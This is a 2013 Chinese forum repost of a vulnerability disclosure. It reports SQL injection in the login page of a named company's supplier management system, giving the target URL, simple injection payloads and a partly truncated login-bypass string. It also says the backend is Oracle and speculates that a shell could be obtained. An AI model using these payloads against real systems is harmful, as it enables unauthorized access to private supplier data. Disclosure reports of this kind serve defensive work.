找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2737|回复: 0
打印 上一主题 下一主题

万达供应商系统SQL注射漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-24 20:16:41 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:万达某分站sql注入。敏感信息泄露。! b6 n- R/ P" f
详细说明:, z# H( h: E& C3 r- Q9 N0 z
万达scm系统登陆框sql注入。0 _$ b6 Y" M2 T3 j& Q4 B7 O. b
. d8 E, V2 x. C
http://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%27, [; J8 F$ K3 o# }

* `+ c1 F( |  Q& e3 T1 N1 Z# B8 z* A; W# Q8 ^/ U
500错误。. B1 v) x3 d# M+ x4 F

/ y* N# M3 Z, ?% J用户名随便输,提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。, p0 m1 y9 M% i# `1 @0 i. m) @
http://www.myhack58.com/Article/UploadPic/2013-3/201332317223677547.png! a+ W! V5 P- P3 W& P+ |7 \
截图有一点问题,用户名,和密码输入' and 1=1 --可以得到相同的提示,可自测。)( L1 v& g! A) p( L" z- d- m
经过分析,登陆验证的过程应该是:/ H+ H" m# J8 r5 u+ O% u
$ K* i0 ?( b  j2 T
取用户名查询数据库,有该用户,再用该用户密码和输入的密码进行比对,相同则登陆成功。7 z' Q" f; w* e  n& a  _
http://www.myhack58.com/Article/UploadPic/2013-3/201332317233886589.png
7 n& w* f8 s1 D
! W5 b7 D. Q+ D! q6 }oracle数据库,存在注入点。@大连万达,你怎么看?
+ b1 |( E. D# ]0 B5 H9 Bhttp://www.myhack58.com/Article/UploadPic/2013-3/201332317241777393.png
7 ]* e+ L9 P- ~
" I; y: `' L; u7 b* K1 ^系统里有万达的供应商资料什么的,提交数据的地方随便输入',提交500错误。没深入。目测可shell。
' Z( s8 u6 V# `$ X+ H# o- _3 w* \漏洞证明:3 V5 ^9 p. J- @
万达scm系统登陆框sql注入。8 q4 x4 x3 P1 y, M

0 h' W9 F1 \* I3 @9 qhttp://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%27
6 Q; U6 `% ?  O7 g4 V2 l+ T. L* L  E& \& p  w
7 ^# A% d/ w' |) T3 k. t( n
500错误。
9 q* ^0 m" O- m
6 F2 r0 j: z" z2 Y9 O用户名随便输,提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。
7 h) o- P# U4 i6 {, k7 Uhttp://www.myhack58.com/Article/UploadPic/2013-3/20133231728465694.png0 x8 d5 X- e/ F, h. A

. F: D. ]* Z; L! \3 O3 o$ w# i. M8 R6 O' s4 R
(截图有一点问题)+ y" Y, [; L4 Y7 y+ {, Q
: ?, s  L# L$ G! \: z5 n6 D  g4 a
怎么饶都饶不过去;经过分析,登陆验证的过程应该是:, g- Z9 n$ e( U
3 u/ |5 X- ?2 w: o8 v  q
取用户名查询数据库,有该用户,再用该用户密码和输入的密码进行比对,相同则登陆成功。
  E# c  [4 U9 x% f4 Y3 {
$ l+ k# e6 w3 z3 ?3 ~+ q绕过:
) y! ?' Z! H( [! |8 J! {6 M$ _http://www.vans-china.cn/LoginUs ... 1%27=%271&PWD=1" A9 [% ?5 y2 L8 J, q) u+ g
; l  Z5 m/ j5 j5 g  A4 |) u

/ ?2 L% u1 H+ d/ ooracle数据库,存在注入点。@大连万达,你怎么看?
) w/ A/ ]$ I* n6 B  ]0 f5 p! [0 z​系统里有万达的供应商资料什么的,有发布公告,没深入。目测可shell。: @7 H9 l( C% F
  \; N* [- _$ I9 R- r
修复方案:7 T6 N/ \* Z2 x$ G8 C0 |2 K9 E
。。。4 f* T. D& `" M* p5 B
6 p  P7 a' x, R# P7 z/ {: {3 C
% u2 s# B6 Q6 M, _0 t" P) I
厂商已经确认
. _  b- s! ?( ^+ I6 s
' `! `7 W( u- Y[/td][/tr]
% Q& I8 |  d+ X  Q[/table]* \, x6 p$ L( X; z, x6 \* T
# Z8 Z5 B3 v, ?, P9 y: U9 h. [
  F2 X$ o) [  a( o5 Q6 B$ g, h
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表